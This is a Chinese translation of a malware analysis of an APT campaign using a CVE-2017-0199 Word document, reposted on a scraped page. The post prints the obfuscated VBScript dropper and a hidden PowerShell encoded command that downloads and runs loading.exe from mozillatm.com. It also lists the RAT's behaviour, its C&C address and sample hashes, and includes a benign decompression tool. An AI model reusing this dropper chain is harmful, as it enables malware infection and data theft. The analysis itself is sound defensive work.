2. 程式人生 > >帶你走進二進制-一次APT攻擊分析

帶你走進二進制-一次APT攻擊分析

阿新 發佈:2017-08-10
uac dga name threading 自動 記錄 convert i春秋 nal

原文:https://osandamalith.com/2017/06/04/apt-attack-in-bangladesh/ 由prison翻譯整理,首發i春秋
引言; 這是一次來自遙遠國度的APT攻擊分析樣本範例,本文作者將帶領你體驗二進制漏洞分析的樂趣。 過程非常詳細,附帶所需樣本,適合新手。難度三顆星。
目標文件: http://mozillatm.com/A0Jst6jAd7CYerrqFmwb4wqDLa5XHPW_May_2017.doc VirusTotal: https://virustotal.com/en/file/273b0fc627daefd0fbae209e5fa1ea619bfb177a1b0ae2d55a606cf2c6ec2674/analysis/1496541543/
我發現這裏存在 CVE-2017-0199,這樣就讓我們找payload變得簡單了。

技術分享

b = ‘00000068007400740070003a002f002f006d006f007a0069006c006c00610074006d002e0063006f006d002f006c006f006100640069006e0067002e00680074006d006c00000000‘
  
"".join("{0}".format((i+j).replace(‘00‘,‘‘).decode(‘hex‘)) for i, j in zip(b[::2], b[1::2]))
  
>> ‘http://mozillatm.com/loading.html‘
這個漏洞將會交付一個惡意的HTA文件並執行它。HTA意味著IE,所以VBScript將會很好地執行。 一旦我們訪問了這個頁面,我們就可以看到這個被混淆的的VBScript,它會執行PowerShell並將惡意軟件投放到系統中。

技術分享

你可以從這裏參考 https://pastebin.com/kt3LNwiw 這個環節開始變得有意思起來了。 
fuNctioN gJSoYXXAVqwD()
  
    DIM taCXnLuJDFFL
  
    taCXnLuJDFFL = cHRW(34)
     CReaTEoBJecT(HLJlzxWsFMxQ(CGUgZBJuvRsW("V1RzVENUUlRJVHBUVFQuVHNUaFRlVExUTFQ="))).expANdEnVIRoNMEnTSTrInGS(HLJlzxWsFMxQ(CGUgZBJuvRsW("JVpzWnlac1p0WmVaTVpSWm9ab1pUWiVa")))
     HLJlzxWsFMxQ(CGUgZBJuvRsW("XGtTa3lrU2tUa0VrTWszazJrXGtXa2lrTmtEa29rV2tTa3Brb2tXa0Vrcmtza0hrRWtMa0xrXGt2azFrLmswa1xrcGtva3drZWtSa3NraGtFa0xrTGsua2VreGtFaw=="))
     ChRw(34)
  
    CreAtEOBJeCt(HLJlzxWsFMxQ(CGUgZBJuvRsW("d0FzQWNBckFJQXBBdEEuQXNBaEFFQWxBbEE="))).run taCXnLuJDFFL
     " POwerShELL.exe -EXECUtIOnPOlIcY BYPaSS -noPROfiLE -WInDoWStYlE HiDDen -EnCOdedCommAnD IAAoAG4ARQB3AC0AbwBCAEoARQBDAHQAIABTAHkAcwBUAEUATQAuAE4AZQBUAC4AVwBlAGIAYwBMAGkAZQBOAFQAKQAuAEQAbwB3AG4ATABPAEEARABGAGkATABFACgAIAAdIGgAdAB0AHAAOgAvAC8AbQBvAHoAaQBsAGwAYQB0AG0ALgBjAG8AbQAvAGwAbwBhAGQAaQBuAGcALgBlAHgAZQAdICAALAAgAB0gJABFAG4AdgA6AFQATQBQAFwAQwBoAHIAbwBtAGUAdABtAC4AZQB4AGUAHSAgACkAIAA7ACAAcwBUAEEAcgBUACAAHSAkAEUAbgB2ADoAdABNAFAAXABDAGgAcgBvAG0AZQB0AG0ALgBlAHgAZQAdIA== " , 0
  
eND fUnCtioN

[/table]

但是如果先不管被混淆的代碼,直接調試代碼的話,最終”taCXnLuJDFFL”這個變量將會被包含進去。 
""C:\Windows\SySTEM32\WiNDoWSpoWErsHELL\v1.0\poweRshELL.exE""

[table=98%]

技術分享

偽代碼可以這樣寫:

Set oShell = WScript.CreateObject ("WSCript.shell")
oShell.run  ""C:\Windows\SySTEM32\WiNDoWSpoWErsHELL\v1.0\poweRshELL.exE""  & " POwerShELL.exe -EXECUtIOnPOlIcY BYPaSS -noPROfiLE -WInDoWStYlE HiDDen -EnCOdedCommAnD IAAoAG4ARQB3AC0AbwBCAEoARQBDAHQAIABTAHkAcwBUAEUATQAuAE4AZQBUAC4AVwBlAGIAYwBMAGkAZQBOAFQAKQAuAEQAbwB3AG4ATABPAEEARABGAGkATABFACgAIAAdIGgAdAB0AHAAOgAvAC8AbQBvAHoAaQBsAGwAYQB0AG0ALgBjAG8AbQAvAGwAbwBhAGQAaQBuAGcALgBlAHgAZQAdICAALAAgAB0gJABFAG4AdgA6AFQATQBQAFwAQwBoAHIAbwBtAGUAdABtAC4AZQB4AGUAHSAgACkAIAA7ACAAcwBUAEEAcgBUACAAHSAkAEUAbgB2ADoAdABNAFAAXABDAGgAcgBvAG0AZQB0AG0ALgBlAHgAZQAdIA== " , 0
一旦我們破解了為powershell提供的編碼命令,我們就能看到被下載的惡意軟件。 這是一個PowerShell一行程序將惡意軟件從http://mozillatm.com/loading.exe並將其保存到% TMP%文件夾類似於“Chrometm.exe” 這個惡意軟件是用可視化的Basic語言編寫的,並且高度混淆。我把這個樣本提交給了Malwr.com,你可以在這裏查看完整的分析。 攻擊者似乎使用的是RAT。 https://malwr.com/analysis/YmJiNTEwYzE5OWFkNDZjYmFiNTY0OWZhMzA5YzgyOGY/

技術分享

在運行之後,它會將自己的程序“mozillatm.exe”復制到“program files”文件夾中。我們可以自行進入檢查下。另一個exe是“Mozillatms.exe “在”system32“文件夾中,註意這個’s’,看起來像是一種備份。

技術分享

Program Files中復制的文件:

技術分享

然而機智如我註意到一些不一樣的地方。在64位機器中惡意軟件將會把它自己復制到“C:\windows\SysWow64” 文件夾中,那麽這個自動生成的秘鑰就不會在64位下的機器中運行,這說明這個惡意軟件的備份在64位下的機器中將會失效。

技術分享

“Mozillatm.exe”將是我們的惡意可執行文件。

技術分享

該惡意軟件將與C&C通信,IP地址為162.248.92.28:131106。

技術分享

這個惡意軟件將會存儲截屏、按鍵記錄並將它們發送到C&C服務器。它們位於%USERPROFILE%\AppData\Roaming\Mozillatms

技術分享

技術分享

按鍵日誌可以在“logs”文件夾中找到。

技術分享

屏幕快照數據使用壓縮算法進行二次壓縮,但是可以輕松地解壓。

技術分享

我編寫了一個簡單的工具來使用壓縮算法執行壓縮和解壓。

/*
 * Title: Deflate Tool
 * Purpose: Compress and decompress files using the Deflate algorithm
 * Author: Osanda Malith Jayathissa (@OsandaMalith)
 * Website: [url]https://OsandaMalith.com[/url]
 */
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.IO;
using System.IO.Compression;
 
namespace compress2
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("[~] Deflate Tool - @OsandaMalith\n");
 
            if (args.Length != 3)
            {
                Console.WriteLine("Usage: {0} input.dat output.dat -c or -d", System.AppDomain.CurrentDomain.FriendlyName);
                System.Environment.Exit(-1);
            }
 
            DeflateStream deflate = null;
            FileStream sink = null;
            FileStream source = new FileStream(Environment.GetCommandLineArgs()[1], FileMode.Open);
 
            if (Environment.GetCommandLineArgs()[3].Substring(1, 1).Equals("d"))
            {
                deflate = new DeflateStream(source, CompressionMode.Decompress);
                sink = new FileStream(Environment.GetCommandLineArgs()[2], FileMode.Create);
 
                byte[] buffer = new byte[source.Length];
                buffer = new byte[source.Length];
 
                deflate.Read(buffer, 0, buffer.Length);
                sink.Write(buffer, 0, buffer.Length);
                sink.Close();
            }
            else if (Environment.GetCommandLineArgs()[3].Substring(1, 1).Equals("c"))
            {
                deflate = new DeflateStream(source, CompressionMode.Compress);
                sink = new FileStream(Environment.GetCommandLineArgs()[2], FileMode.Create);
                byte[] buffer = new byte[source.Length];
                source.Read(buffer, 0, buffer.Length);
                deflate.Write(buffer, 0, buffer.Length);
                sink.Write(buffer, 0, buffer.Length);
                sink.Close();
            }
            else
            {
                Console.WriteLine("Enter an option -c compress or -d decompress");
                System.Environment.Exit(-1);
            }
 
            source.Close();
        
        }
    }
}

這是惡意軟件的截圖。

技術分享

出於好奇,我查看了C&C IP地址162.248.92.28,發現使用了Squid代理。

技術分享

但是,它使用HTTP身份驗證。

技術分享

通過使用谷歌搜索,我發現這些域名也是使用相同的惡意軟件進行攻擊的變種。

·         Bd2bd.com
·         Pc-net.org
·         Bd-pc.com
·         Registerbd.com
·
附上我分析過的樣本: Filename: loading.exe
SHA256: 9865ccfe4dd0c893c88d24168425933e5663ee8861a3b360e1b10e63769f5392
https://virustotal.com/en/file/9865ccfe4dd0c893c88d24168425933e5663ee8861a3b360e1b10e63769f5392/analysis/1496541573/
https://malwr.com/analysis/YmJiNTEwYzE5OWFkNDZjYmFiNTY0OWZhMzA5YzgyOGY/? Filename: A0Jst6jAd7CYerrqFmwb4wqDLa5XHPW_May_2017.doc
SHA256: 273b0fc627daefd0fbae209e5fa1ea619bfb177a1b0ae2d55a606cf2c6ec2674
https://virustotal.com/en/file/273b0fc627daefd0fbae209e5fa1ea619bfb177a1b0ae2d55a606cf2c6ec2674/analysis/1496541543/

帶你走進二進制-一次APT攻擊分析

相關推薦

走進-APT攻擊分析

uac dga name threading 自動 記錄 convert i春秋 nal 原文:https://osandamalith.com/2017/06/04/apt-attack-in-bangladesh/ 由prison翻譯整理,首發i春秋 引言;

個數的數中所含1的個數的代碼實現

article snippet 出現 pri data- count tdi main 代碼實現 #include<stdio.h> int numberOf1_solution1(int n)/*將一個正數以此向右移一位,與1做與運算。直到這個數為零

使用ruby的fpm模塊實現對MySQL的RPM包作,實現鍵安裝

rpm fpm 隨著互聯網的發展,一些互聯網企業,甚至於傳統企業的服務器也是越來越多。將面臨的挑戰其中之一就是自動化運維管理。假設我們需要自動化部署很多的應用,而這些應用又很復雜,過程多,需要源碼安裝。就算你能夠用自動化來完成這些工作,但配置起來也是相當的麻煩。那麽現在就有一種技術可以將源碼安裝的

LintCode算法題解——奇偶分割數組、中1個數、反轉整數、加、排序數組轉換為高度最小的叉搜索樹、求和

code style 求和 二進制 題解 二叉 following 算法題 targe Y3訟韭62獻si鏈倥8臣khttp://www.facebolw.com/space/2103837/following 7v6d04Vhpf玖忠http://www.facebol

劍指offer十中1的個數

play blog pre splay 1=1 是把 num 補碼 div 一、題目 輸入一個整數,輸出該數二進制表示中1的個數。其中負數用補碼表示。 二、思路   方法一: 用1(1自身左移運算,其實後來就不是1了)和n的

輸出個數的所有位及奇偶位

輸出一個數二進制的所有位及奇偶位首先我們看一下輸出一個整數二進制的所有位。如果要輸出它的所有位,從最高位開始每次移動i個長度,並且每一位都與1。代碼:#include <stdio.h> int main() { int num = 9; int i; for (i = 31; i>

Codeforces Round #267 (Div. 2) B. Fedor and New Game【位運算/給m+1個數讓判斷所給數的形式與第m+1個數不相同的位數是不是小於等於k,是的話就累計起來】

ons ecif 否則 ans contain rst rmi sum any After you had helped George and Alex to move in the dorm, they went to help their friend

Ex 2_25 n位十整數轉換為形式..._第四作業

運行時 es2017 整數 cnblogs 二進制 .cn http bsp alt (a) 當n=1時,(10)d=(1010)b 當n=2時,(100)d=(10)d x (10)d=(1010)b x (1010)b 當n=4時,(

劍指offer-10.求個數中格式中1的個數

clas 分析 又是 題目 補碼 off number 替換 一個數 0 題目 輸入一個整數,輸出該數二進制表示中1的個數。其中負數用補碼表示。 1 分析 一個數除2,余數為1,那麽表示二進制中含有一個1。 因此可以使用循環,依次判斷。 但是除法效率底,這裏又是除2,因此可

輸入個數,輸出他的

dia option body bsp out pos log show 二進制 int a =Integer.parseInt(JOptionPane.showInputDialog (null,"請輸入一個數:")); int e = a;

shell腳本轉化為執行文件的種方法

shell 加密 因為腳本中需要明文顯示密碼的需求,想法是將已經編輯好的shell腳本,封裝成二進制可執行文件。使用工具shc官方下載網站:http://www.datsi.fi.upm.es/~frosal/使用最新版本:shc-3.8.9b.tgz tar -zxvf shc-3.8.9b.tgz

代碼運算規律是逢

new 字符0 trie nbsp ati array pac state system 它由兩個基本字符0,1組成,二進制代碼運算規律是逢二進一。 十進制1, 二進制也是1; 十進制2(1+1), 二進制為10; 十進制3(1+1+1), 二進制為11; 十進制4, 二進

元的角度看建築「摩根·帝巢丨湛江工程資質×××」

特色 ado 日本 停止 就是 設定 ima gdc dba 我從小到大是個十足的動漫迷,從小學開始迷戀日本漫畫直至現在。從《哆啦A夢》、《櫻桃小丸子》這批經典到後來的《海賊王》、《火影忍者》這批灌輸熱血的雞湯……但如今似乎更流行二次元動漫。 二次元動漫不僅盛產帥哥美女,還

255以內全

進制 bsp nbsp 進制數 二進制 1 0000 00013 0000 00117 0000 011115 0000 111131 0001 111163 0011 1111127 0111 1111 255 1111 1111 255 1111 1111254

安裝kubernetes v1.11.2 (第十章 node節點部署)

tab flanneld tar ips html apt www. span 1.2 繼續前一章部署。 十一、node節點部署 kubernetes node 節點運行了如下組件: flannel docker kubelet kube-proxy 11.1 部署fl

k8s鍵安裝腳本()

process cluster schedule ado 分割 tps ins code -- 安裝案例:系統:Centos可以多臺Master(Master不能低於3臺)多臺Node此案例使用三臺Master兩臺Node,用戶名root,密碼均為123456 master

階1-4期】JavaScript深入之走進記憶體機制

本期的主題是呼叫堆疊,本計劃一共28期,每期重點攻克一個面試重難點,如果你還不瞭解本進階計劃,文末點選檢視全部文章。 如果覺得本系列不錯,歡迎點贊、評論、轉發,您的支援就是我堅持的最大動力。 JS記憶體空間分為棧(stack)、堆(heap)、池(一般也會歸類為棧中)。 其中棧存放變數,堆存放複雜物件

篇文章快速理解微服務架構,由淺入深走進微服務架構的核心

首先微服務並沒有一個官方的定義,想要直接描述微服務比較困難,我們可以通過對比傳統WEB應用,來理解什麼是微服務。 傳統的WEB應用核心分為業務邏輯、介面卡以及API或通過UI訪問的WEB介面。業務邏輯定義業務流程、業務規則以及領域實體。介面卡包括資料庫訪問元件、訊息元件以及訪

MDA模型驅動引擎-走進真正的模型驅動開發()

帶你走進MDA的世界。--真正的模型驅動開發。目前的建模工具很多,不過個人的觀點來看,基本都跑偏了。沒辦法真正應用模型驅動來有效開發。廢話少說。下面的就是MDA(KAYA)建模工具。左側是需要用到的元素,簡單說來包括 1.Product(產品&服務--可以看作系統名稱

走進Java集合_HashMap原始碼分析_分析容器大小必須是2的整數冪原因

我們上一篇文章主要介紹了HashMap的底層資料結構、構造方法、重要的屬性,在上一篇我們遺留了一個問題,那就是為什麼HashMap的大小必須是2的整數次冪,這一篇文章,我們從原始碼的角度來解決這個問題。首先我們回顧一下上一篇文章的重點內容1)HashMap的底層資料結構是陣列